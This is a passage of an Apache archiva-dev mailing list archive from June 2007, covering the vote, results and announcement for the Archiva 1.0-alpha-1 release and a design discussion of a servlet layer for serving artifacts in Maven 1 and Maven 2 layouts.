Received: by ug-out-1314.google.com with SMTP id 34so188327ugf for <[email protected]>; Tue, 05 Jun 2007 06:37:25 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=Pu/sYsZD9dBLfaKiO+J18EXd6vzYNOMmtDOW5AAP0JncR6pof4pKkcDivchCkdA2PAUoutFY0g5CMugdyHAgcVwQbFPsSOFTuuoPSjWliyuj791N5p8tz7UGeX1CbwEE82jOos3b28YrQaFrTWhPDGgKRhyAzfmGKthMFh5/U7s= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=JqTijyRXC3xrmaw00c/m9rlNCoA8FU93TWiDd059IcA4popfRH+r6pPP+DQzO5kqxmZtQ/Z6cg4y31jtl4T84sabA99hyNrxkdLGUR76VKQ+JA1vvBG1iObF+GT66ARXJbGfIggTHcGGVMNQ5yktndEf08XT8RgA+TBuCp/+RE0= Received: by 161.129.204.104 with SMTP id n16mr282645hue.1181050645317; Tue, 05 Jun 2007 06:37:25 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Tue, 5 Jun 2007 06:37:24 -0700 (PDT) Message-ID: <[email protected]> Date: Tue, 5 Jun 2007 15:37:24 +0200 From: "nicolas de loof" <[email protected]> To: [email protected] Subject: Re: [VOTE] Release Archiva 1.0-alpha-1 In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_18581_2006254.1181050644940" References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_18581_2006254.1181050644940 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline I agrea. Simply adding support for converting legacy -> default requests requires to patch the DavServer. Adding support for server-side relocation requires even more. A new layer between Dav servlet and the repository (and it's proxies) would make things cleaner and extensible. Is there any draft for an API ? 2007/6/5, Joakim Erdfelt <[email protected]>: > > I don't like hooking up the webdav interface into the dynamic artifact > serving. > I think we need to investigate the DASL layer idea in the Archiva > Roadmap, maybe move it up in priority. > > http://docs.codehaus.org/display/MAVENUSER/Archiva+Roadmap > > - Joakim > > nicolas de loof wrote: > > I allready noticed this no-update-check issue on 0.9 in MRM-320, but > > maybe I > > wasn't clear as it was closed as "won't fix". > > > > I'm looking for a clean way to pre-process the DAV request before > proxies > > connectors get fetched. This could include the legacy -> default (or any > > other) request path layout conversion. For now, the only way I've > > found is > > to add some code in ProxiedDavServer. > > > > Could ArtifactReference, VersionedReference and ProjectReference share > an > > ancestor so that we can refactor BidirectionalRepositoryLayout to only > > provide toReference(path) and toPath(Reference) ? This would avoid > having > > similar try/catch 3 times. > > > > > > > > 2007/6/5, Joakim Erdfelt <[email protected]>: > >> > >> MRM-412 will make it into Archiva 1.0-alpha-2 thanks! > >> > >> As for the check for the requested file issue, yes that is a mistake, > >> likely left over from an earlier time, when things were more chaotic, a > >> time when great herds of horned alpacas roamed the earth. > >> > >> - Joakim > >> > >> nicolas de loof wrote: > >> > I just submitted MRM-412 and attached a patch. > >> > > >> > This issue adds support for any layout to the DavServlet : > >> > Requesting "/javax.servlet/jars/servlet-api-2.3.jar" or > >> > "/javax/servlet/servlet-api/2.3/servlet-api-2.3.jar" will auto-detect > >> the > >> > layout used for the request (based on configured layouts in archiva) > >> > and use > >> > it to build the ArchivaArtifact object. > >> > This requires the BidirectionalRepositoryLayout interface to be > >> > enhanced to > >> > add detection of valid path. > >> > > >> > please review. > >> > > >> > > >> > I also notice the ProxiedDavServer does check for the requested > >> file to > >> > exist in managed repo before trying to proxy it. Doesn't this > >> bypass any > >> > update strategy configured in proxies ? Perhaps I missed something ? > >> > > >> > > >> > 2007/6/4, Joakim Erdfelt <[email protected]>: > >> >> > >> >> doh! *I* never voted on this. :-) > >> >> > >> >> +1 to release. > >> >> > >> >> - Joakim > >> >> > >> >> Joakim Erdfelt wrote: > >> >> > Archiva 1.0-alpha-1 was tagged and built this afternoon. > >> >> > > >> >> > The proposed distribution, including binary distributions, and > >> >> > signatures can be found here: > >> >> > > >> >> > http://people.apache.org/builds/maven/archiva/1.0-alpha-1/ > >> >> > > >> >> > To keep up with the trend started by Wendy Smoak (sorta): > >> >> > The 1.0-alpha-1 staged copy was setup and configured to point to > >> >> > a pre-built repository, and then used to build the next archiva > >> >> > snapshot (1.0-alpha-2-SNAPSHOT) in archiva/trunk. > >> >> > > >> >> > This will be Archiva's first release with a proper database, and > >> >> > is intended to get a testable baseline of the archiva feature set > >> >> > into the hands of all interested individuals. > >> >> > > >> >> > The list of issues identified and closed with this release can > >> >> > be found below: > >> >> > > >> >> > Archiva 1.0-alpha-1 Release Notes: > >> >> > > >> >> > > >> >> > >> > http://jira.codehaus.org/secure/ReleaseNote.jspa?projectId=10980&styleName=Html&version=13443 > >> > >> >> > >> >> > > >> >> > > >> >> > This is an alpha release, and as such, has bugs. > >> >> > > >> >> > Once people have a chance to kick the prototype tires, and look > >> >> around, > >> >> > the most urgent jira tickets will be addressed quickly for a > >> >> 1.0-alpha-2 > >> >> > release, with an expected release 1 to 2 weeks after this one. > >> >> > > >> >> > Known issues include documentation, problems with proxying, > >> problems > >> >> > running the webapp on Tomcat, missing reporting, empty or > >> inaccurate > >> >> > dependency tree information, and poor grammar. > >> >> > These and other issues can be tracked at the URL below: > >> >> > > >> >> > Archiva 1.0-alpha-2 Open Issues: > >> >> > > >> >> > >> > http://jira.codehaus.org/secure/IssueNavigator.jspa?reset=true&mode=hide&sorter/order=DESC&sorter/field=priority&resolution=-1&pid=10980&fixfor=13518 > >> > >> >> > >> >> > > >> >> > > >> >> > Once you have had a chance to examine the distribution, please > cast > >> >> > your vote. We welcome votes and feedback from all community > >> members. > >> >> > > >> >> > [ ] +1 Release it! > >> >> > [ ] 0 > >> >> > [ ] -1 Don't release it, because... > >> >> > > >> >> > 72 hours ends Monday afternoon (GMT -5) > >> >> > If you need more time, just ask. > >> >> > > >> >> > >> >> > >> >> -- > >> >> - Joakim Erdfelt > >> >> Committer and PMC Member, Apache Maven > >> >> Archiva Developer > >> >> [email protected] > >> >> [email protected] > >> >> Alpaca Founding Member > > ------=_Part_18581_2006254.1181050644940-- From [email protected] Tue Jun 05 13:41:30 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 91075 invoked from network); 5 Jun 2007 13:41:29 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 5 Jun 2007 13:41:29 -0000 Received: (qmail 25830 invoked by uid 500); 5 Jun 2007 13:41:33 -0000 Delivered-To: [email protected] Received: (qmail 25797 invoked by uid 500); 5 Jun 2007 13:41:33 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 25788 invoked by uid 99); 5 Jun 2007 13:41:33 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 05 Jun 2007 06:41:33 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO mail.sventech.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 05 Jun 2007 06:41:28 -0700 Received: from mail.sventech.com (localhost.localdomain [161.129.204.104]) by mail.sventech.com (Postfix) with ESMTP id 513B04803E for <[email protected]>; Tue, 5 Jun 2007 13:41:07 +0000 (UTC) Received: from [161.129.204.104] (c-71-59-8-58.hsd1.ga.comcast.net [161.129.204.104]) by mail.sventech.com (Postfix) with ESMTP id 135C14803C for <[email protected]>; Tue, 5 Jun 2007 13:41:06 +0000 (UTC) Message-ID: <[email protected]> Date: Tue, 05 Jun 2007 09:47:01 -0400 From: Joakim Erdfelt <[email protected]> User-Agent: Thunderbird 161.129.204.104 (X11/20070501) MIME-Version: 1.0 To: [email protected] Subject: [RESULTS] [VOTE] Release Archiva 1.0-alpha-1 References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Scanned: ClamAV using ClamSMTP X-Virus-Checked: Checked by ClamAV on apache.org The following are the results of this vote. +5 Binding Votes ( Jesse, Emmanuel, Wendy, Fabrice, and Myself) +2 Non-binding Votes (Maria, and Nicolas) The release is good to go. I'll send another update when it has been completed. - Joakim Joakim Erdfelt wrote: > Archiva 1.0-alpha-1 was tagged and built this afternoon. > > The proposed distribution, including binary distributions, and > signatures can be found here: > > http://people.apache.org/builds/maven/archiva/1.0-alpha-1/ > > To keep up with the trend started by Wendy Smoak (sorta): > The 1.0-alpha-1 staged copy was setup and configured to point to > a pre-built repository, and then used to build the next archiva > snapshot (1.0-alpha-2-SNAPSHOT) in archiva/trunk. > > This will be Archiva's first release with a proper database, and > is intended to get a testable baseline of the archiva feature set > into the hands of all interested individuals. > > The list of issues identified and closed with this release can > be found below: > > Archiva 1.0-alpha-1 Release Notes: > > http://jira.codehaus.org/secure/ReleaseNote.jspa?projectId=10980&styleName=Html&version=13443 > > > This is an alpha release, and as such, has bugs. > > Once people have a chance to kick the prototype tires, and look around, > the most urgent jira tickets will be addressed quickly for a 1.0-alpha-2 > release, with an expected release 1 to 2 weeks after this one. > > Known issues include documentation, problems with proxying, problems > running the webapp on Tomcat, missing reporting, empty or inaccurate > dependency tree information, and poor grammar. > These and other issues can be tracked at the URL below: > > Archiva 1.0-alpha-2 Open Issues: > http://jira.codehaus.org/secure/IssueNavigator.jspa?reset=true&mode=hide&sorter/order=DESC&sorter/field=priority&resolution=-1&pid=10980&fixfor=13518 > > > Once you have had a chance to examine the distribution, please cast > your vote. We welcome votes and feedback from all community members. > > [ ] +1 Release it! > [ ] 0 > [ ] -1 Don't release it, because... > > 72 hours ends Monday afternoon (GMT -5) > If you need more time, just ask. From [email protected] Tue Jun 05 14:04:00 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 99076 invoked from network); 5 Jun 2007 14:03:59 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 5 Jun 2007 14:03:59 -0000 Received: (qmail 97722 invoked by uid 500); 5 Jun 2007 14:04:02 -0000 Delivered-To: [email protected] Received: (qmail 97684 invoked by uid 500); 5 Jun 2007 14:04:02 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 97675 invoked by uid 99); 5 Jun 2007 14:04:02 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 05 Jun 2007 07:04:02 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO an-out-0708.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 05 Jun 2007 07:03:58 -0700 Received: by an-out-0708.google.com with SMTP id d30so464602and for <[email protected]>; Tue, 05 Jun 2007 07:03:37 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=cnkBujQRkOKYTyDW8spGD5dTS7nfbPGRMXveTUt/M+A2bfjH9oJBxtjSTpTw8+MypZGodukQT1Kb+4tYtFEsOXBvKmGuIcdBDFb4L/9c20987hQgs+1XDcPqwM03XGn43KvWQv5kl7StQGGGuuAa9K8foZdW25KlRUVZTXGayFU= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=GrJwiYMguHoQfcCE+ldXc3XIcZurUKUxI7scOoIUXO0+3PPyVrqzwZ49hmWbR8Fsnf6q4jh+JtKY9RB5fU6BjdVUY+vn8ZiBVjO53ajRp31znuGjcNwUvddAnCwX4+Dms6zOxrF9M/BEYh9NqRumtI9u1Lb1FuKkbsKqn0xdHho= Received: by 161.129.204.104 with SMTP id 12mr3236714anm.1181052217383; Tue, 05 Jun 2007 07:03:37 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Tue, 5 Jun 2007 07:03:37 -0700 (PDT) Message-ID: <[email protected]> Date: Tue, 5 Jun 2007 07:03:37 -0700 From: "Wendy Smoak" <[email protected]> To: [email protected] Subject: Re: [VOTE] Release Archiva 1.0-alpha-1 In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline References: <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org On 6/3/07, Wendy Smoak <[email protected]> wrote: > On 6/1/07, Joakim Erdfelt <[email protected]> wrote: > > Archiva 1.0-alpha-1 was tagged and built this afternoon. > > > > http://people.apache.org/builds/maven/archiva/1.0-alpha-1/ > ... > > [ ] +1 Release it! > > [ ] 0 > > [ ] -1 Don't release it, because... > > +1 - license and notice files in place, known problems with proxying > prevent me from testing as thoroughly as I'd like, but it appears to > serve artifacts that are already in its repos. The source distribution is missing LICENSE and NOTICE files: http://people.apache.org/builds/maven/archiva/1.0-alpha-1/m2-staging-repository/org/apache/maven/archiva/archiva-parent/1.0-alpha-1/ Please add those files at the top level and fix the signature/checksums before distributing it from www.apache.org/dist/maven. (It also should unpack to archiva-${version}-src, I'll open an issue...) And I get at test failure when I try to build from that source distribution. Hard to tell where, exactly. It's in whichever module has 'BidirectionalRepositoryLayoutFactoryTest'. -- Wendy From [email protected] Tue Jun 05 15:38:40 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 33707 invoked from network); 5 Jun 2007 15:38:35 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 5 Jun 2007 15:38:34 -0000 Received: (qmail 15826 invoked by uid 500); 5 Jun 2007 15:38:35 -0000 Delivered-To: [email protected] Received: (qmail 15760 invoked by uid 500); 5 Jun 2007 15:38:34 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 15730 invoked by uid 99); 5 Jun 2007 15:38:34 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 05 Jun 2007 08:38:34 -0700 X-ASF-Spam-Status: No, hits=2.9 required=10.0 tests=HTML_10_20,HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO ug-out-1314.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 05 Jun 2007 08:38:30 -0700 Received: by ug-out-1314.google.com with SMTP id 34so228358ugf for <[email protected]>; Tue, 05 Jun 2007 08:38:09 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type; b=eygyyv/jIwArYMtxlwKIHFrFRlRMEP0ReKbQ03XCfIn/58Qtqk5ro1Lam3N0g+Wh3UQEQmc3CU2uCNGlwb9GL3jpk0bdObKfRpgOcIQTj5ChsNfXBN1DrcH2lI+6/4kjor6wOUdKVlGcuHxY8ebqRgKGTk4K1zBWBud4B96+cAo= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:mime-version:content-type; b=rD2mQ/NtW2/5GSAKvRnyaEYynREqO9AB2xJuttGKT6MB7kC3zIN6v2Z4SUfvFPVehNxkya12EjasL5dXQVJe+8pPHcSl8lVHNkZL7MvgjKI2CaAoIxpTDWHhLT3g+wadTVezTckiY6O/8aihr6l2IdfQpVFkOokkn7cvy+2qS+4= Received: by 161.129.204.104 with SMTP id s17mr2520702hue.1181057888685; Tue, 05 Jun 2007 08:38:08 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Tue, 5 Jun 2007 08:38:08 -0700 (PDT) Message-ID: <[email protected]> Date: Tue, 5 Jun 2007 17:38:08 +0200 From: "nicolas de loof" <[email protected]> To: [email protected] Subject: service layer API proposal MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_20444_24094133.1181057888667" X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_20444_24094133.1181057888667 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline Hello, To enhance archiva-1.0 support for maven1, I'd like to introduce a layer between DavServlet and repository proxies connectors. As Joakim suggested, this is the scope of the Dynamic Artifact Serving Layer in archiva roadmap. I propose this API : public interface ArtifactServingLayer { /** * Retrieve an artifact path in the repository based on the resource string. */ public String getResourcePath( String resource ); } The serving layer is responsible of finding the resource in the managed repository, with any required logic or temporary content, and to give a repository-related path back to the DavServer. The default implementation could simply use proxies-connectors to find the resource, and some interceptors / proxies could add features, like converting on-the-fly from a layout format to the managedRepository layout, handle artifact relocation when a non-POM artifact is requested, or anything we discover to be usefull. What's your opinion ? ------=_Part_20444_24094133.1181057888667-- From [email protected] Tue Jun 05 16:13:30 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 50681 invoked from network); 5 Jun 2007 16:13:11 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 5 Jun 2007 16:13:11 -0000 Received: (qmail 84544 invoked by uid 500); 5 Jun 2007 16:13:14 -0000 Delivered-To: [email protected] Received: (qmail 84430 invoked by uid 500); 5 Jun 2007 16:13:14 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 84419 invoked by uid 99); 5 Jun 2007 16:13:13 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 05 Jun 2007 09:13:13 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,MIME_HTML_ONLY X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO mail.sventech.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 05 Jun 2007 09:13:08 -0700 Received: from mail.sventech.com (localhost.localdomain [161.129.204.104]) by mail.sventech.com (Postfix) with ESMTP id 9BE2B4803C for <[email protected]>; Tue, 5 Jun 2007 16:12:47 +0000 (UTC) Received: from [161.129.204.104] (c-71-59-8-58.hsd1.ga.comcast.net [161.129.204.104]) by mail.sventech.com (Postfix) with ESMTP id 068D94801A for <[email protected]>; Tue, 5 Jun 2007 16:12:46 +0000 (UTC) Message-ID: <[email protected]> Date: Tue, 05 Jun 2007 12:18:42 -0400 From: Joakim Erdfelt <[email protected]> User-Agent: Thunderbird 161.129.204.104 (X11/20070501) MIME-Version: 1.0 To: [email protected] Subject: Re: service layer API proposal References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Scanned: ClamAV using ClamSMTP X-Virus-Checked: Checked by ClamAV on apache.org <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <meta content="text/html;charset=ISO-8859-1" http-equiv="Content-Type"> </head> <body bgcolor="#ffffff" text="#000000"> We have 2 concepts that are co-mingled right now.<br> <br> 1) Getting an artifact from Archiva.<br> 2) Deploying an artifact to Archiva.<br> <br> This proposal should focus on #1, Getting an artifact from Archiva.<br> (As for #2, that can remain the realm of the current DavServlet implementation)<br> <br> I always pictured this as a new GetArtifactServlet.<br> <br> Lets say we have it mapped to the "/get" servlet mapping.<br> The following urls would all point to the same artifact.<br> <br> : Basic Format for maven 1 clients.<br> <a href="http://hostname.com/archiva/get/maven1/org.apache.maven.wagon/jars/wagon-scm-1.0-alpha-3.jar">http://hostname.com/archiva/get/maven1/org.apache.maven.wagon/jars/wagon-scm-1.0-alpha-3.jar</a><br> : Basic Format for maven 2 clients.<br> <a href="http://hostname.com/archiva/get/maven2/org/apache/maven/wagon/wagon-scm/1.0-alpha-3/wagon-scm-1.0-alpha-3.jar">http://hostname.com/archiva/get/maven2/org/apache/maven/wagon/wagon-scm/1.0-alpha-3/wagon-scm-1.0-alpha-3.jar</a><br> <br> : (Advanced / Future Use) apt/deb serving.<br> <a href="http://hostname.com/archiva/get/apt-deb/org.apache.maven.wagon/wagon-scm-1.0-alpha-3.deb">http://hostname.com/archiva/get/apt-deb/org.apache.maven.wagon/wagon-scm-1.0-alpha-3.deb</a><br> : (Advanced / Future Use) yum/rpm serving.<br> <a href="http://hostname.com/archiva/get/yum-rpm/org.apache.maven.wagon/wagon-scm-1.0-alpha-3.rpm">http://hostname.com/archiva/get/yum-rpm/org.apache.maven.wagon/wagon-scm-1.0-alpha-3.rpm</a><br> <br> Using a new servlet, would essentially decouple the filesystem format/layout as a requirement.<br> Archiva can assume maven 2 format for the filesystem, and serve the artifact to the client in the way that is requested.&nbsp; After all the artifact information is now in the database.&nbsp; It makes sense to me to do it this way.<br> <br> The idea with the URL format is that "/get/{implementation-id}/{artifact-reference-implementation-format}"<br> <br> The implementation id can be a plexus role-hint on the implementation of this GetArtifactServlet.<br> <br> What do you think?<br> <br> - Joakim<br> <br> nicolas de loof wrote: <blockquote cite="mid:[email protected]" type="cite">Hello, <br> <br> To enhance archiva-1.0 support for maven1, I'd like to introduce a layer <br> between DavServlet and repository proxies connectors. <br> As Joakim suggested, this is the scope of the Dynamic Artifact Serving Layer <br> in archiva roadmap. <br> <br> I propose this API : <br> <br> public interface ArtifactServingLayer <br> { <br> &nbsp;&nbsp; /** <br> &nbsp;&nbsp;&nbsp; * Retrieve an artifact path in the repository based on the resource <br> string. <br> &nbsp;&nbsp;&nbsp; */ <br> &nbsp;&nbsp; public String getResourcePath( String resource ); <br> } <br> <br> The serving layer is responsible of finding the resource in the managed <br> repository, with any required logic or temporary content, and to give a <br> repository-related path back to the DavServer. <br> <br> The default implementation could simply use proxies-connectors to find the <br> resource, and some interceptors / proxies could add features, like <br> converting on-the-fly from a layout format to the managedRepository layout, <br> handle artifact relocation when a non-POM artifact is requested, or anything <br> we discover to be usefull. <br> <br> What's your opinion ? <br> </blockquote> <br> </body> </html> From [email protected] Tue Jun 05 16:37:38 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 59274 invoked from network); 5 Jun 2007 16:37:36 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 5 Jun 2007 16:37:36 -0000 Received: (qmail 17380 invoked by uid 500); 5 Jun 2007 16:37:40 -0000 Delivered-To: [email protected] Received: (qmail 17266 invoked by uid 500); 5 Jun 2007 16:37:40 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 17257 invoked by uid 99); 5 Jun 2007 16:37:40 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 05 Jun 2007 09:37:40 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO mail.sventech.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 05 Jun 2007 09:37:35 -0700 Received: from mail.sventech.com (localhost.localdomain [161.129.204.104]) by mail.sventech.com (Postfix) with ESMTP id A16FA4803C for <[email protected]>; Tue, 5 Jun 2007 16:37:14 +0000 (UTC) Received: from [161.129.204.104] (c-71-59-8-58.hsd1.ga.comcast.net [161.129.204.104]) by mail.sventech.com (Postfix) with ESMTP id 6934B4801A for <[email protected]>; Tue, 5 Jun 2007 16:37:14 +0000 (UTC) Message-ID: <[email protected]> Date: Tue, 05 Jun 2007 12:43:10 -0400 From: Joakim Erdfelt <[email protected]> User-Agent: Thunderbird 161.129.204.104 (X11/20070501) MIME-Version: 1.0 To: [email protected] Subject: [ANNOUNCE] Archiva 1.0 Alpha 1 Release Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Scanned: ClamAV using ClamSMTP X-Virus-Checked: Checked by ClamAV on apache.org The Maven Archiva team is quietly announcing (meaning no notification on archiva-users@) the release of Archiva 1.0 Alpha 1. This version is considered a release for testing the various features of Archiva. It has known problems with the Configuration screens, Proxying, and Deployment on Tomcat. The next release 1.0-alpha-2 will address these known concerns directly, and will have a quick turn around time. The release distribution, including checksums and signatures, can be downloaded from: http://maven.apache.org/archiva/download.html -- - Joakim Erdfelt Committer and PMC Member, Apache Maven Archiva Developer [email protected] From [email protected] Tue Jun 05 18:18:55 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 72968 invoked from network); 5 Jun 2007 18:18:54 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 5 Jun 2007 18:18:54 -0000 Received: (qmail 28146 invoked by uid 500); 5 Jun 2007 18:18:56 -0000 Delivered-To: [email protected] Received: (qmail 28105 invoked by uid 500); 5 Jun 2007 18:18:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 28096 invoked by uid 99); 5 Jun 2007 18:18:56 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 05 Jun 2007 11:18:56 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO ug-out-1314.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 05 Jun 2007 11:18:51 -0700 Received: by ug-out-1314.google.com with SMTP id 34so277888ugf for <[email protected]>; Tue, 05 Jun 2007 11:18:29 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=C4NzhwYBBRZkvIm9nF3Pbr+QYLXjpZTKFd54Yaki7Um3oxrxLFRQWPZ7a4zZI2dDtc7YLg1d3NyynPcZOc/MM5WPs3GraoBWrM6eAbzkJ+69WzULe9QZz0qpbV/d0f41Ey/l1Zj7/aalpw9BQn8t6hUKAi2/csaiXuv7QZQxE/A= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=he5hliW504cA/O2VQmwSDUYFoSbuH52Axdi4srfx4rzjpEnBTuUveHi3ZliPjIu7EOAJmBkplG9t+TMmQF44WJ7T9cvNZoJhfy6aIkVFMYACvVqajgoNQe5z+DJfxVy9T4dk8opi5MVgyv87FtJoAUKZonA74ordV+EwIZMQt14= Received: by 161.129.204.104 with SMTP id s9mr2628501huf.1181067508601; Tue, 05 Jun 2007 11:18:28 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Tue, 5 Jun 2007 11:18:28 -0700 (PDT) Message-ID: <[email protected]> Date: Tue, 5 Jun 2007 20:18:28 +0200 From: "nicolas de loof" <[email protected]> To: [email protected] Subject: Re: service layer API proposal In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_22947_7996697.1181067508575" References: <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_22947_7996697.1181067508575 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline The "/get/{implementation-id}/{layout-path}" is an interesting option. Where would you place the target managed repository in such an URL ? The only thing I don't like in this solution is that it doesn't work based on an auto-detection of the requested format. I'd prefer the servlet to search for an implementation that accepts the requested path, so that the current "/repository/id/{layout}" would be valid for any supported layout. 2007/6/5, Joakim Erdfelt <[email protected]>: > > We have 2 concepts that are co-mingled right now. > > 1) Getting an artifact from Archiva. > 2) Deploying an artifact to Archiva. > > This proposal should 